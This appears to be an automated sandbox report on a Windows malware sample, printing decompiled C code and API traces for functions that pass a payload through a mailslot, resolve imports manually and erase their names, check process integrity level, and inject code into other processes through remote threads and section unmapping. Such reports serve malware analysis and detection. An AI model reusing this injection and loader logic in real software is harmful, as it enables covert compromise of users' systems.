  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
